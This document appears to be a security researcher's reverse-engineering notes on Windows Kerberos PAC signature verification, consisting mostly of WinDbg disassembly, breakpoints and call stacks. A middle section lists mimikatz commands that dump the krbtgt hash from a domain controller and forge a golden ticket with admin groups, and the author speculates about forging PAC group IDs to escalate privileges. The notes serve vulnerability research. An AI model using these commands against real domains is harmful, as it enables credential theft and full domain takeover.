63a91d0a ff7008 push dword ptr [eax+8]
63a91d0d ffd1 call ecx
63a91d0f e97a74ffff jmp KDCSVC!KdcVerifyPacSignature+0x18f (63a8918e)
KDCSVC!KdcVerifyPacSignature+0x1f1:
63a91d14 f6401c40 test byte ptr [eax+1Ch],40h
63a91d18 0f85ca74ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x1fb:
63a91d1e 687bffffff push 0FFFFFF7Bh
63a91d23 ff7584 push dword ptr [ebp-7Ch]
63a91d26 e848fefeff call KDCSVC!KerbGetKeyFromList (63a81b73)
63a91d2b 8bf0 mov esi,eax
63a91d2d 85f6 test esi,esi
63a91d2f 0f84b374ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x212:
63a91d35 8d45b8 lea eax,[ebp-48h]
63a91d38 50 push eax
63a91d39 8b45a0 mov eax,dword ptr [ebp-60h]
63a91d3c ff30 push dword ptr [eax]
63a91d3e e86cfefeff call KDCSVC!CDLocateCheckSum (63a81baf)
63a91d43 85c0 test eax,eax
63a91d45 7d0c jge KDCSVC!KdcVerifyPacSignature+0x230 (63a91d53)
KDCSVC!KdcVerifyPacSignature+0x224:
63a91d47 c745bc0f000000 mov dword ptr [ebp-44h],0Fh
63a91d4e e99f74ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x230:
63a91d53 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d56 8b4820 mov ecx,dword ptr [eax+20h]
63a91d59 85c9 test ecx,ecx
63a91d5b 7414 je KDCSVC!KdcVerifyPacSignature+0x24e (63a91d71)
KDCSVC!KdcVerifyPacSignature+0x23a:
63a91d5d 8d45b4 lea eax,[ebp-4Ch]
63a91d60 50 push eax
63a91d61 6a11 push 11h
63a91d63 8d45c0 lea eax,[ebp-40h]
63a91d66 50 push eax
63a91d67 ff7604 push dword ptr [esi+4]
63a91d6a ff7608 push dword ptr [esi+8]
63a91d6d ffd1 call ecx
63a91d6f eb0f jmp KDCSVC!KdcVerifyPacSignature+0x25d (63a91d80)
KDCSVC!KdcVerifyPacSignature+0x24e:
63a91d71 8d4db4 lea ecx,[ebp-4Ch]
63a91d74 51 push ecx
63a91d75 6a11 push 11h
63a91d77 ff7604 push dword ptr [esi+4]
63a91d7a ff7608 push dword ptr [esi+8]
63a91d7d ff501c call dword ptr [eax+1Ch]
KDCSVC!KdcVerifyPacSignature+0x25d:
63a91d80 85c0 test eax,eax
63a91d82 7d0c jge KDCSVC!KdcVerifyPacSignature+0x26d (63a91d90)
KDCSVC!KdcVerifyPacSignature+0x261:
63a91d84 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91d8b e96274ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x26d:
63a91d90 8d45e8 lea eax,[ebp-18h]
63a91d93 50 push eax
63a91d94 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d97 ff7004 push dword ptr [eax+4]
63a91d9a ff75b4 push dword ptr [ebp-4Ch]
63a91d9d ff5010 call dword ptr [eax+10h]
63a91da0 8d45d4 lea eax,[ebp-2Ch]
63a91da3 50 push eax
63a91da4 ff75b4 push dword ptr [ebp-4Ch]
63a91da7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91daa ff5014 call dword ptr [eax+14h]
63a91dad 8d45b4 lea eax,[ebp-4Ch]
63a91db0 50 push eax
63a91db1 8b45b8 mov eax,dword ptr [ebp-48h]
63a91db4 ff5018 call dword ptr [eax+18h]
63a91db7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91dba 8b4804 mov ecx,dword ptr [eax+4]
63a91dbd 8b459c mov eax,dword ptr [ebp-64h]
63a91dc0 8b4004 mov eax,dword ptr [eax+4]
63a91dc3 83e804 sub eax,4
63a91dc6 3bc8 cmp ecx,eax
63a91dc8 7510 jne KDCSVC!KdcVerifyPacSignature+0x2b3 (63a91dda)
KDCSVC!KdcVerifyPacSignature+0x2a7:
63a91dca 8d7dc0 lea edi,[ebp-40h]
63a91dcd 8d75d4 lea esi,[ebp-2Ch]
63a91dd0 33c0 xor eax,eax
63a91dd2 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a91dd4 0f840e74ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2b3:
63a91dda 687c1ea963 push offset KDCSVC!`string' (63a91e7c)
KDCSVC!KdcVerifyPacSignature+0x2bf:
63a91ddf 6a01 push 1
63a91de1 e89d1effff call KDCSVC!KDCDebugPrint (63a83c83)
63a91de6 59 pop ecx
63a91de7 59 pop ecx
63a91de8 c745bc29000000 mov dword ptr [ebp-44h],29h
63a91def eb1f jmp KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x2d8:
63a91df1 ff7510 push dword ptr [ebp+10h]
63a91df4 ff75b0 push dword ptr [ebp-50h]
63a91df7 e85a58ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a91dfc 84c0 test al,al
63a91dfe 0f85e473ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2e7:
63a91e04 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91e0b e9d873ffff jmp KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2f4:
63a91e10 8b75a8 mov esi,dword ptr [ebp-58h]
63a91e13 0fb706 movzx eax,word ptr [esi]
63a91e16 40 inc eax
63a91e17 40 inc eax
63a91e18 50 push eax
63a91e19 e84301ffff call KDCSVC!MIDL_user_allocate (63a81f61)
63a91e1e 8bd8 mov ebx,eax
63a91e20 85db test ebx,ebx
63a91e22 7416 je KDCSVC!KdcVerifyPacSignature+0x31e (63a91e3a)
KDCSVC!KdcVerifyPacSignature+0x308:
63a91e24 0fb70e movzx ecx,word ptr [esi]
63a91e27 8b7604 mov esi,dword ptr [esi+4]
63a91e2a 8bc1 mov eax,ecx
63a91e2c c1e902 shr ecx,2
63a91e2f 8bfb mov edi,ebx
63a91e31 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a91e33 8bc8 mov ecx,eax
63a91e35 83e103 and ecx,3
63a91e38 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
KDCSVC!KdcVerifyPacSignature+0x31e:
63a91e3a 53 push ebx
63a91e3b 6a01 push 1
63a91e3d 8d45bc lea eax,[ebp-44h]
63a91e40 50 push eax
63a91e41 6a04 push 4
63a91e43 68120000c0 push 0C0000012h
63a91e48 6a01 push 1
63a91e4a e8aa550000 call KDCSVC!ReportServiceEvent (63a973f9)
63a91e4f 83c418 add esp,18h
63a91e52 85db test ebx,ebx
63a91e54 0f849873ffff je KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x33a:
63a91e5a 53 push ebx
63a91e5b e84700ffff call KDCSVC!MIDL_user_free (63a81ea7)
63a91e60 e98d73ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x349:
63a91e65 8b45b8 mov eax,dword ptr [ebp-48h]
63a91e68 85c0 test eax,eax
63a91e6a 0f848f73ffff je KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
KDCSVC!KdcVerifyPacSignature+0x350:
63a91e70 8d4db4 lea ecx,[ebp-4Ch]
63a91e73 51 push ecx
63a91e74 ff5018 call dword ptr [eax+18h]
63a91e77 e98373ffff jmp KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
[*] Golden attack:
(1) From the AD:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : SMALLBUSINESS / S-1-5-21-1053798420-2132824579-2427655443
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 6375ac5dba2a03b83002ba6e6e96c547 <-- it is what we need!
* WDigest
* Kerberos
Default Salt : SMALLBUSINESS.LOCALkrbtgt
Credentials
des_cbc_md5 : 497f68d05db65be0
des_cbc_crc : 497f68d05db65be0
6375ac5dba2a03b83002ba6e6e96c547
(2) From the machine we’re attacking (user juan):
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:6375ac5dba2a03b83002ba6e6e96c547
That’s all.
I think the idea is similar to the golden attack, but hopefully we don't need the
krbtgt key anymore. Even when I can modify the SignatureType, and create RC4
encrypted tickets with different signatures, the key is still needed to encrypt
a ticket.
So, by modifying mimikatz I can easily create different "malformed tickets". Even
when I can switch the signature mechanism I need the krbtgt hash to encrypt the
TGT ticket.
(Hash for DES)
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:497f68d05db65be0
To check the signature used by ValidationInfo I'm using the following breakpoint:
bp 63a89167 "r edx; dd edx L1; kb 4; g"
gwillcox-r7 at November 22, 2020 3:35am UTC reported:
Troubleshooting kerberos on windows
<http://technet.microsoft.com/en-us/library/cc738673(WS.10).aspx>
<http://www.itninja.com/blog/view/taming-the-three-headed-beast-kerberos>
Golden and silver ticket
<https://www.youtube.com/watch?v=-IMrNGPZTl0> (blackhat)
<http://www.slideshare.net/gentilkiwi/bluehat-2014realitybites>
<http://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
<http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos> (ticket format)
<https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos>
MS-PAC: Privilege Attribute Certificate Data Structure
<http://msdn.microsoft.com/en-us/library/cc237917.aspx>
Microsoft Authorization Data Specification
<http://mirror.die.net/banned/microsoft-kerberos-extensions.html>
Authentication structures:
<http://msdn.microsoft.com/en-us/library/windows/desktop/aa378120(v=vs.85).aspx>
More Kerberos fun with PAC’s- decrypt the PAC
<http://i1.blogs.msdn.com/b/spatdsg/archive/2009/03/26/more-kerberos-fun-with-pac-s.aspx>
Kerberos PAC Validation… what is it?
<http://blogs.msdn.com/b/spatdsg/archive/2007/03/07/pac-validation.aspx>
Kerberos on windows
<https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
Windows 2003: Security Event ids related to kerberos 540 (logon) / 538 (logoff)
I’m pretty sure the information to forge exists inside service kerberos ticket
In my opinion the idea is to forge the KERB_VALIDATION_INFO. It contains:
ULONG GroupCount;
[size_is(GroupCount)] PGROUP_MEMBERSHIP GroupIds;
Where:
typedef struct _GROUP_MEMBERSHIP {
ULONG RelativeId;
ULONG Attributes;
} *PGROUP_MEMBERSHIP;
Modifying the RelativeId in the service ticket is, I think, the way to the privilege
escalation (see ticket_samples.txt for a KERB_VALIDATION_INFO dump).
But... how to tamper with that information? Since the Kerberos communication (server
running on 88/udp) happens through lsass (running as SYSTEM), tampering with the communication
doesn't look like a good idea. Even worse, the KERB_VALIDATION_INFO is located inside the
ticket, which travels encrypted. I NEED TO CHECK CAREFULLY WHERE THE PAC IS ADDED;
HOPEFULLY IT'S IN A BLOB CIPHERED WITH THE USER'S PRIVATE KEY. CAN'T REMEMBER JUST NOW, TODO!
Just remembering: cached tickets maybe can be tampered with. TODO: review
bp kdcsvc!I_GetAsTicket ".echo I_GetAsTicket; g"
Reached through _KdcGetTicket (also an export)
bp kdcsvc!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; g"
This one is apparently reached when handling TGT requests:
HandleTGSRequest -> GetTGSTicket...
bp kdcsvc!KdcVerifyPac ".echo KdcVerifyPac; g"
It’s an export, also reached through “CredentialUpdateFree”
When I authenticate to a service (IIS) through Kerberos, this is the call sequence:
I_GetAsTicket
KdcVerifyPacSignature
KdcVerifyPacSignature
I_GetAsTicket
KdcVerifyPacSignature
Okay, let's check what happens when I add the kerberos function:
kd> bp kerberos!KerbVerifyPacsignature ".echo kerberos!KerbVerifyPacsignature; g"
kd> g
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
Makes sense! Let's check some call stacks to see where things come from:
kd> bl
0 e 63a8b814 0001 (0001) KDCSVC!I_GetASTicket ".echo I_GetAsTicket; kb 4; g"
1 e 63a89013 0001 (0001) KDCSVC!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; kb 4; g"
2 e 63a8d3ad 0001 (0001) KDCSVC!KdcVerifyPac ".echo KdcVerifyPac; kb 4; g"
3 e 71ca8587 0001 (0001) kerberos!KerbVerifyPacSignature ".echo kerberos!KerbVerifyPacsignature; kb 4; g"
_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050ae688 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050ae688 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015b9e0 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015b9e4 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145238 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145238 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00aef7b8 71cb1ef3 00aefa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00aef8fc 71cb1159 00000001 00aefab0 0017c1e8 kerberos!KerbCreateTokenFromTicket+0x1de
00aefaec 4ab860d2 0016cce0 00000000 3c9b6229 kerberos!SpAcceptLsaModeContext+0xb09
00aefb60 4abc94a8 00aefc18 00aefbf8 00aefbe0 LSASRV!WLsaAcceptContext+0x139
I_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050b73b8 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050b73b8 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015bc10 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015bc14 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145418 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145418 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00c6f7b8 71cb1ef3 00c6fa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00c6f8fc 71cb1159 00000001 00c6fab0 0017c190 kerberos!KerbCreateTokenFromTicket+0x1de
00c6faec 4ab860d2 0016cce0 00000000 3f4a60da kerberos!SpAcceptLsaModeContext+0xb09
00c6fb60 4abc94a8 00c6fc18 00c6fbf8 00c6fbe0 LSASRV!WLsaAcceptContext+0x139
So, obviously I_GetAsTicket is called through the first query (AS); KdcVerifyPacSignature and
kerberos!KerbVerifyPacsignature are called on the second request (TGT). Looks like the PAC is
parsed/verified in the second query (TGT, makes sense).
[*] Other backtraces for my review while logging in the domain from XP SP3 client
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf980 71d17acb 000b8780 00000290 009cfd84 kerberos!PAC_UnMarshal
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x2ec
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 5 hit
kerberos!PAC_ReMarshal:
001b:71d2d188 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15b25 000b8780 00000290 009cf9cc kerberos!PAC_ReMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x185
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15c04 000b8780 00000290 009cf9cc kerberos!PAC_UnMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x264
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 1 hit
kerberos!PAC_UnmarshallValidationInfo:
001b:71d2d466 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 3 hit
kerberos!PAC_DecodeValidationInformation:
001b:71d2cf2e 6a14 push 14h
kd> kb
ChildEBP RetAddr Args to Child
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 8 hit
kerberos!PPAC_IDL_VALIDATION_INFO_Decode:
001b:71d2d6f5 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf844 71d2cf7f 000936f0 009cf9f0 000b89c0 kerberos!PPAC_IDL_VALIDATION_INFO_Decode
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation+0x51
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
[*] More breakpoints from the XP SP3 client: looks like there are two paths, one to
get the TGT and one to get the service ticket. The latter is the interesting one,
I think.
kd> kb
ChildEBP RetAddr Args to Child
0007f4c0 71cfbc26 00103828 000ed248 000c2f48 kerberos!KerbCacheTicket
0007f68c 71cf3611 00101ce0 000f6c30 00000000 kerberos!KerbGetAuthenticationTicket+0xa77
0007f760 71cf33c8 00101ce0 000f6c30 00000000 kerberos!KerbGetTicketGrantingTicket+0x2f4
0007f794 71cf1db1 00000000 000f6c30 00000000 kerberos!KerbGetTicketForCredential+0x5d
0007f7f4 71cf2d85 000f6c30 80000002 00000000 kerberos!KerbReferenceCredential+0x12a
0007f9a8 7573c293 000f6c30 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xae3
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 13 hit
kerberos!KerbCacheTicket:
001b:71cf9a79 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
0007f6ec 71cf9a6f 00103818 000d5240 000c2f48 kerberos!KerbCacheTicket
0007f7cc 71cf722e 00101ce0 000f6c30 00000000 kerberos!KerbGetServiceTicket+0x893
0007f9a8 7573c293 00000002 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xd60
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Reaching the important point in my case:
kd> uf KDCSVC!KdcVerifyPacSignature
KDCSVC!KdcVerifyPacSignature:
63a89013 8bff mov edi,edi
63a89015 55 push ebp
63a89016 8bec mov ebp,esp
63a89018 81eca8000000 sub esp,0A8h
63a8901e a10010ab63 mov eax,dword ptr [KDCSVC!__security_cookie (63ab1000)]
63a89023 53 push ebx
63a89024 56 push esi
63a89025 8b7514 mov esi,dword ptr [ebp+14h]
63a89028 8945fc mov dword ptr [ebp-4],eax
63a8902b 8b4508 mov eax,dword ptr [ebp+8]
63a8902e 57 push edi
63a8902f 8945ac mov dword ptr [ebp-54h],eax
63a89032 8b450c mov eax,dword ptr [ebp+0Ch]
63a89035 6a0f push 0Fh
63a89037 33db xor ebx,ebx
63a89039 8945a8 mov dword ptr [ebp-58h],eax
63a8903c 59 pop ecx
63a8903d ff7510 push dword ptr [ebp+10h]
63a89040 66899d58ffffff mov word ptr [ebp-0A8h],bx
63a89047 33c0 xor eax,eax
63a89049 8dbd5affffff lea edi,[ebp-0A6h]
63a8904f f3ab rep stos dword ptr es:[edi]
63a89051 56 push esi
63a89052 8975b0 mov dword ptr [ebp-50h],esi
63a89055 895dbc mov dword ptr [ebp-44h],ebx
63a89058 895db8 mov dword ptr [ebp-48h],ebx
63a8905b 895db4 mov dword ptr [ebp-4Ch],ebx
63a8905e 66ab stos word ptr es:[edi]
63a89060 e81feeffff call KDCSVC!PAC_UnMarshal (63a87e84)
63a89065 85c0 test eax,eax
63a89067 0f84178d0000 je KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x5a:
63a8906d 8d8558ffffff lea eax,[ebp-0A8h]
63a89073 50 push eax
63a89074 b92810ab63 mov ecx,offset KDCSVC!SecData (63ab1028)
63a89079 e8668bffff call KDCSVC!CSecurityData::GetKrbtgtTicketInfo (63a81be4)
63a8907e 3bc3 cmp eax,ebx
63a89080 8945bc mov dword ptr [ebp-44h],eax
